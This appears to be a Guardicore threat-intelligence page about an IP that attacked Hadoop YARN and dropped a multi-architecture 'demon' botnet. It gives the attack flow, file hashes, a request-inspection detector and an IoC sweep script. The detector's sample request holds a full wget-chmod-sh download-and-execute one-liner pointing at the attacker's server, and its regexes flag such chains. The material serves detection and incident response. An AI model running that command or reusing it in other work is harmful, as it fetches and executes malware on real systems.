IP Address: 138.68.22.27 (Previously Malicious)


IP Address:
138.68.22.27
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

HadoopYARN

Tags

HTTP, HadoopYARN, Malicious File, IDS - Web Application Attack, Outgoing Connection, Download and Allow Execution, Download and Execute, Download File, Inbound HTTP Request

Associated Attack Servers

aruba.it

52.168.150.12, 194.182.73.177, 80.211.50.132, 40.76.38.75, 104.248.208.208, 52.166.121.133, 13.92.131.99, 13.82.50.132, 52.233.143.163, 40.71.182.235, 52.166.206.33, 52.233.179.93, 13.81.2.109, 40.114.243.66, 13.92.99.153, 52.174.179.113, 40.114.13.12, 137.135.92.186, 52.166.59.19, 52.166.63.111

Basic Information

IP Address

138.68.22.27

Domain

-

ISP

DigitalOcean

Country

United States

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-09-30

Last seen in Guardicore Centra

2018-10-08

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time.

Attack Flow

Process /usr/bin/wget generated outgoing network traffic to: 104.248.208.208:80 17 times

Outgoing Connection

The file /tmp/bins.sh was downloaded and granted execution privileges

Download and Allow Execution

The file /tmp/demon.arm4tl was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.arm4tl was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.arm5 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.arm5 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.arm6 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.arm6 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

IDS detected Web Application Attack: 401TRG Generic Webshell Request - POST with wget in body

IDS - Web Application Attack

The file /tmp/demon.i486 was downloaded and executed 5 times

Download and Execute

Process /tmp/demon.i486 generated outgoing network traffic to: 104.248.208.208:555

Outgoing Connection

The file /tmp/demon.i686 was downloaded and executed 3 times

Download and Execute

Process /tmp/demon.i686 generated outgoing network traffic to: 104.248.208.208:555

Outgoing Connection

The file /tmp/demon.m68k was downloaded and executed 2 times

Download and Execute

The file /tmp/demon.mips was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.mips was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.mips64 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.mips64 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.mpsl was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.mpsl was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.ppc was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.ppc was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.sparc was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.sparc was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.x86 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.x86 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.i586 was downloaded and executed 2 times

Download and Execute

The file /tmp/demon.sh4 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.sh4 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

The file /tmp/demon.arm7 was downloaded and granted execution privileges

Download and Allow Execution

/tmp/demon.arm7 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

Connection was closed due to user inactivity

/tmp/demon.m68k was identified as malicious by YARA according to rules: Maldoc Somerules, Suspicious Strings and 000 Common Rules

Malicious File

/tmp/demon.i486 was identified as malicious by YARA according to rules: Maldoc Somerules, Suspicious Strings and 000 Common Rules

Malicious File

/tmp/demon.i586 was identified as malicious by YARA according to rules: Suspicious Strings and 000 Common Rules

Malicious File

/tmp/demon.i686 was identified as malicious by YARA according to rules: Maldoc Somerules, Suspicious Strings and 000 Common Rules

Malicious File
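The IDS event in the flow above ("POST with wget in body") and the fetch, chmod, execute sequence that the other events record can be checked at the HTTP layer before the dropper ever lands in /tmp. The following is an added example written for this page; it is not Guardicore's code and not the IDS rule itself. The two request samples, the path /submit and the Host header are constructed for the demo; the host 104.248.208.208 and the path /tmp/bins.sh are taken from the attack flow.

```python
"""Inspect raw HTTP requests for the download-and-execute one-liner pattern.

Added example for this page (not Guardicore code). Request samples below are
constructed; 104.248.208.208 and /tmp/bins.sh come from the attack flow.
"""
import re
from typing import Dict, List, Optional, Tuple

# Download / C2 host reported in the attack flow on this page.
KNOWN_BAD_HOSTS = {"104.248.208.208"}

# Stage 1: a fetch tool pointed at a remote host (scheme://host or bare IPv4).
FETCH_RE = re.compile(
    r"\b(?P<tool>wget|curl)\b[^;&|\n]*?"
    r"(?:(?:https?|ftp)://(?P<h1>[^/\s:\"]+)|(?P<h2>\d{1,3}(?:\.\d{1,3}){3}))",
    re.I,
)
# Stage 2: the dropped file is marked executable (chmod +x / chmod 7xx etc.).
CHMOD_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")
# Stage 3: a shell runs something out of a world-writable directory.
EXEC_RE = re.compile(r"\b(?:sh|bash)\s+/(?:tmp|dev/shm|var/tmp)/\S+")


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_request(raw: str) -> Dict[str, object]:
    """Verdict for one request: the signature fires on a fetch tool in a POST
    body; the chmod and exec stages, when present, raise confidence."""
    method, path, _headers, body = parse_request(raw)
    stages: List[str] = []
    host: Optional[str] = None
    if method.upper() == "POST":
        m = FETCH_RE.search(body)
        if m:
            host = m.group("h1") or m.group("h2")
            stages.append(f"fetch:{m.group('tool').lower()}:{host}")
        if CHMOD_RE.search(body):
            stages.append("chmod")
        if EXEC_RE.search(body):
            stages.append("exec-from-tmp")
    return {
        "method": method,
        "path": path,
        "host": host,
        "known_bad_host": host in KNOWN_BAD_HOSTS,
        "stages": stages,
        "flagged": any(s.startswith("fetch:") for s in stages),
    }


# Constructed samples: /submit and the Host header are hypothetical.
MALICIOUS_POST = (
    "POST /submit HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"command": "cd /tmp; wget http://104.248.208.208/bins.sh -O /tmp/bins.sh; '
    'chmod 777 /tmp/bins.sh; sh /tmp/bins.sh"}'
)
BENIGN_POST = (
    "POST /submit HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
    '{"command": "echo hello; date"}'
)

if __name__ == "__main__":
    for sample in (MALICIOUS_POST, BENIGN_POST):
        print(inspect_request(sample))
```

The fetch regex deliberately requires either a URL scheme or a bare IPv4 literal so that an output path such as `-O /tmp/bins.sh` is not mistaken for the download host; the extra stages are reported separately so a single `wget` in a legitimate job submission can be triaged differently from the full three-stage chain.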

Associated Files

/tmp/yeet

SHA256: bed8aab405b6f59ec88224899a2e511a1915d77f8b0d22fb2f44b514d5dadb6d

82750 bytes

/tmp/yeetw

SHA256: 1d73f98a382494b064f49de9f3e0b2564c25a88c0d9855130335eca4e2f097d8

72363 bytes

/tmp/dank.x86

SHA256: b2d27ed238b84e93899772a918fee7bd713d4438d8a0e4bd70b051f21f1f1e35

83042 bytes

/tmp/bins.sh

SHA256: 19b0f111be1bf6d503a78ef65b4316d69265a860dca71da24e2c0f5bbaaba7ef

2388 bytes

/tmp/demon.arm4tl

SHA256: 977cbc0a793e8790d8fd9ad0e761fccbd777a5dd39929d250934fdbc2db24f17

107395 bytes

/tmp/demon.arm5

SHA256: 1a24763a5c6d8aa6f5e751ccdf6e76e4eea3a8bb9d9bf9e56b586646a9b67154

148135 bytes

/tmp/demon.arm6

SHA256: edeac50d5f6860f82b712358b1d5004eb30667d913ecea16e1bc6b181164aa6c

148107 bytes

/tmp/demon.i686

SHA256: 31e316eef160604214e4b8f2483462eee3feabe9e4d3434b149f0be09e6043dd

83814 bytes

/tmp/demon.m68k

SHA256: a24b4bba2943902c03e78284b719801c78499f13507787c6d1c06a2b51469532

87078 bytes

/tmp/demon.mips

SHA256: 1d43360d602c33e3775f19cb9d7fe89f4240927e4e52677a066b7dd165ae87c7

107896 bytes

/tmp/demon.sparc

SHA256: bec5c139b94595ba015ab73294f1d221035e24523606ce1bf655a91de9e7c685

101166 bytes

/tmp/demon.mips64

SHA256: 289bddd97576cd0f151d394caefdaf2ec6ed341c146b9a17b63ab25aa7a98959

135241 bytes

/tmp/demon.mpsl

SHA256: 26eeea9bf0e58184e29e3d03342781a78151b1a7ffbd3dc7e28ac5a54fa3b4f1

189759 bytes

/tmp/demon.x86

SHA256: 3fee836d1dad66aa33742d4d880972bc694e6a6b9aec922fb5c76fe6f73be358

118964 bytes

/tmp/demon.i586

SHA256: 445da506e50db30090c1700f3a2cb9c9e5961733317996908eabf17cb3811b6c

99090 bytes

/tmp/demon.i486

SHA256: 2a036cfafc1afbe450c77a6cfa93d2e548a53846ec2e5316747763b6a8034721

83766 bytes

/tmp/demon.sh4

SHA256: 0fe9b4c062b91e25d27ad515db5ec68cf339fb0723fbda7cac13565eacff1e33

94018 bytes

/tmp/demon.arm7

SHA256: 42f11f6eaf764cc962ac2476f4dcb25549985ea03f67b1e90dd966d22f567568

148107 bytes

/tmp/demon.ppc

SHA256: 43c70e179ee8b1f2e38c48d992ebebe43d2befe38d088062167a6e90f4df8915

135241 bytes
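The hashes above are usable as host indicators. As an added example, not part of this page or of Guardicore's tooling, the following sweeps a directory (typically /tmp) for files whose SHA256 matches the list, files with an executable bit, and the same-stem multi-arch naming pattern (demon.x86, demon.mips, demon.arm7, ...) the dropper used. The sample directory built by build_sample_dir() and its contents are constructed for the demo; their digest is not one of the page's hashes, so the demo run adds it to the known-bad set explicitly.

```python
"""Sweep a directory for the Associated Files listed on this page.

Added example (not Guardicore code). Hashes are copied from the page; the
sample directory is constructed for the demo and contains no malware.
"""
import hashlib
import os
import tempfile
from collections import defaultdict
from pathlib import Path
from typing import Dict, Iterable, List, Set

KNOWN_BAD_SHA256: Set[str] = {
    "19b0f111be1bf6d503a78ef65b4316d69265a860dca71da24e2c0f5bbaaba7ef",  # bins.sh
    "977cbc0a793e8790d8fd9ad0e761fccbd777a5dd39929d250934fdbc2db24f17",  # demon.arm4tl
    "1a24763a5c6d8aa6f5e751ccdf6e76e4eea3a8bb9d9bf9e56b586646a9b67154",  # demon.arm5
    "edeac50d5f6860f82b712358b1d5004eb30667d913ecea16e1bc6b181164aa6c",  # demon.arm6
    "42f11f6eaf764cc962ac2476f4dcb25549985ea03f67b1e90dd966d22f567568",  # demon.arm7
    "2a036cfafc1afbe450c77a6cfa93d2e548a53846ec2e5316747763b6a8034721",  # demon.i486
    "445da506e50db30090c1700f3a2cb9c9e5961733317996908eabf17cb3811b6c",  # demon.i586
    "31e316eef160604214e4b8f2483462eee3feabe9e4d3434b149f0be09e6043dd",  # demon.i686
    "a24b4bba2943902c03e78284b719801c78499f13507787c6d1c06a2b51469532",  # demon.m68k
    "1d43360d602c33e3775f19cb9d7fe89f4240927e4e52677a066b7dd165ae87c7",  # demon.mips
    "289bddd97576cd0f151d394caefdaf2ec6ed341c146b9a17b63ab25aa7a98959",  # demon.mips64
    "26eeea9bf0e58184e29e3d03342781a78151b1a7ffbd3dc7e28ac5a54fa3b4f1",  # demon.mpsl
    "43c70e179ee8b1f2e38c48d992ebebe43d2befe38d088062167a6e90f4df8915",  # demon.ppc
    "0fe9b4c062b91e25d27ad515db5ec68cf339fb0723fbda7cac13565eacff1e33",  # demon.sh4
    "bec5c139b94595ba015ab73294f1d221035e24523606ce1bf655a91de9e7c685",  # demon.sparc
    "3fee836d1dad66aa33742d4d880972bc694e6a6b9aec922fb5c76fe6f73be358",  # demon.x86
    "bed8aab405b6f59ec88224899a2e511a1915d77f8b0d22fb2f44b514d5dadb6d",  # yeet
    "1d73f98a382494b064f49de9f3e0b2564c25a88c0d9855130335eca4e2f097d8",  # yeetw
    "b2d27ed238b84e93899772a918fee7bd713d4438d8a0e4bd70b051f21f1f1e35",  # dank.x86
}

# Architecture suffixes seen on the dropped binaries on this page.
ARCH_SUFFIXES = {"arm4tl", "arm5", "arm6", "arm7", "i486", "i586", "i686", "x86",
                 "m68k", "mips", "mips64", "mpsl", "ppc", "sh4", "sparc"}


def sha256_of(path: Path) -> str:
    """Stream the file so large drops do not get read into memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def multiarch_families(names: Iterable[str], min_family: int = 3) -> Dict[str, List[str]]:
    """Group <stem>.<arch> names by stem; a stem with several arch suffixes
    is the multi-arch drop pattern recorded in the attack flow."""
    fam = defaultdict(set)
    for name in names:
        stem, dot, suffix = name.rpartition(".")
        if dot and stem and suffix in ARCH_SUFFIXES:
            fam[stem].add(suffix)
    return {stem: sorted(s) for stem, s in fam.items() if len(s) >= min_family}


def sweep(directory, known_hashes: Set[str] = KNOWN_BAD_SHA256, min_family: int = 3):
    """Return hash matches, executables and multi-arch families in a directory."""
    hash_matches, executables, names = [], [], []
    for p in sorted(Path(directory).iterdir()):
        if p.is_symlink() or not p.is_file():
            continue  # do not follow links out of the directory
        names.append(p.name)
        digest = sha256_of(p)
        if digest in known_hashes:
            hash_matches.append({"path": str(p), "sha256": digest})
        if p.stat().st_mode & 0o111:
            executables.append(str(p))
    return {"hash_matches": hash_matches, "executables": executables,
            "families": multiarch_families(names, min_family)}


# Constructed demo input: same-stem names as on the page, harmless content.
CONSTRUCTED_PAYLOAD = b"constructed sample, not malware"
CONSTRUCTED_SHA256 = hashlib.sha256(CONSTRUCTED_PAYLOAD).hexdigest()


def build_sample_dir() -> str:
    d = tempfile.mkdtemp(prefix="ioc-sweep-")
    for name in ("demon.x86", "demon.mips", "demon.arm7"):
        Path(d, name).write_bytes(CONSTRUCTED_PAYLOAD)
    Path(d, "notes.txt").write_bytes(b"nothing to see")
    os.chmod(Path(d, "demon.x86"), 0o755)
    return d


if __name__ == "__main__":
    sample = build_sample_dir()
    print(sweep(sample, known_hashes=KNOWN_BAD_SHA256 | {CONSTRUCTED_SHA256}))
```

Run it against a real /tmp with the default hash set; the family and executable checks are heuristics and will also surface legitimate build artifacts, so treat a hash match as the high-confidence signal and the other two as triage hints.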

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.
